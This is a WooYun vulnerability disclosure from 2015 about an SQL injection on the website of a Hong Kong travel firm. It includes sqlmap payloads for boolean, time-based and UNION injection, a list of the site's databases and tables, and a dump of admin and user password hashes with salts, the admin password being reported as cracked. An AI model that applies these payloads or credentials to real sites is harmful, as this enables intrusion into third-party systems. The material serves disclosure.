当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152246

漏洞标题:環島旅運有限公司官网存在SQL注入(香港地區)

相关厂商:環島旅運有限公司

漏洞作者: 路人甲

提交时间:2015-11-06 12:31

修复时间:2015-12-25 15:28

公开时间:2015-12-25 15:28

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-06: 细节已通知厂商并且等待厂商处理中
2015-11-10: 厂商已经确认,细节仅向厂商公开
2015-11-20: 细节向核心白帽子及相关领域专家公开
2015-11-30: 细节向普通白帽子公开
2015-12-10: 细节向实习白帽子公开
2015-12-25: 细节向公众公开

简要描述:

RT,環島旅運、環球汽車為冠忠巴士集團(上巿公司編號306)之附屬公司,分別於1973年及1968年成立。我們於酒店客運服務行業擁有領導地位,主要的客戶群包括香港大部份世界級的酒店。能夠維持與客戶們的長期合作關係,充份驗證了本公司的優良服務質素。

详细说明:

权重:

baidu.png


google.png


很简单的存在注入:

**.**.**.**/zh/servicedetails.php?id=13 (GET)

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13' AND 8653=8653 AND 'XtRO'='XtRO
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=13' AND (SELECT * FROM (SELECT(SLEEP(5)))fKOs) AND 'UXBY'='UXBY
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-2618' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171787171,0x4667494d4373704d6c6a,0x716a7a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows
web application technology: PHP 5.4.12, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
available databases [5]:
[*] information_schema
[*] testtransisland
[*] testtransisland_cn
[*] testtransisland_en
[*] transisland


到处瞅瞅:

Database: testtransisland
[48 tables]
+------------------------------------+
| banner                             |
| bannernode                         |
| bannernode_seq                     |
| car                                |
| carnode                            |
| carnode_seq                        |
| carprice                           |
| contactus                          |
| faq                                |
| faqnode                            |
| faqnode_seq                        |
| hkexpress                          |
| link                               |
| linknode                           |
| linknode_seq                       |
| news                               |
| newsnode                           |
| newsnode_seq                       |
| otherairportbook                   |
| otherairportbooknode               |
| otherairportbooknode_seq           |
| park                               |
| parknode                           |
| parknode_seq                       |
| password                           |
| promotion                          |
| promotionnode                      |
| promotionnode_seq                  |
| route                              |
| routenode                          |
| routenode_seq                      |
| visitor_counter                    |
| visitor_counter_hk_visit_spot      |
| visitor_counter_news               |
| visitor_counter_pm                 |
| visitor_counter_service21          |
| visitor_counter_servicedetails_1   |
| visitor_counter_servicedetails_100 |
| visitor_counter_servicedetails_101 |
| visitor_counter_servicedetails_13  |
| visitor_counter_servicedetails_26  |
| visitor_counter_servicedetails_90  |
| visitor_counter_servicedetails_91  |
| visitor_counter_servicedetails_93  |
| visitor_counter_servicedetails_97  |
| visitor_counter_servicedetails_99  |
| visitor_counter_servicelist        |
| visitor_counter_sz_visit_spot      |
+------------------------------------+


Database: transisland
[31 tables]
+--------------------------+
| banner                   |
| bannernode               |
| bannernode_seq           |
| car                      |
| carnode                  |
| carnode_seq              |
| carprice                 |
| contactus                |
| faq                      |
| faqnode                  |
| faqnode_seq              |
| link                     |
| linknode                 |
| linknode_seq             |
| news                     |
| newsnode                 |
| newsnode_seq             |
| otherairportbook         |
| otherairportbooknode     |
| otherairportbooknode_seq |
| park                     |
| parknode                 |
| parknode_seq             |
| password                 |
| promotion                |
| promotionnode            |
| promotionnode_seq        |
| route                    |
| routenode                |
| routenode_seq            |
| visitor_counter          |
+--------------------------+


数据较多哈,password表里面:

Database: transisland
Table: password
[1 entry]
+-----------+----------------------------------+------+
| loginName | password                         | salt |
+-----------+----------------------------------+------+
| admin     | 9f104b4c3c4aa9bb8b31e5124dd8e1dd | 593  |
+-----------+----------------------------------+------+


加盐方法:md5(md5(password)+salt),解除来后为admin admin,弱口令哈
其他表里面也是一样:

Database: testtransisland
Table: password
[4 entries]
+-----------+----------------------------------+------+
| loginName | password                         | salt |
+-----------+----------------------------------+------+
| admin     | 4f6679ced9c06ad18451ba14058c99a5 | 528  |
| tom       | 4b62f5b372179ebae56ce8f192ab1c12 | 000  |
| tina      | 4035c949c4df70d88635fe980c0a17f6 | 000  |
| calvin    | 37096795fd55f1554568c880de099bd4 | 000  |
+-----------+----------------------------------+------+


仅仅测试未深入= =

修复方案:

过滤参数;修改加密方式;修改弱口令

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-10 15:26

厂商回复:

已將事件通知有關機構

最新状态:

暂无

漏洞评价:

评价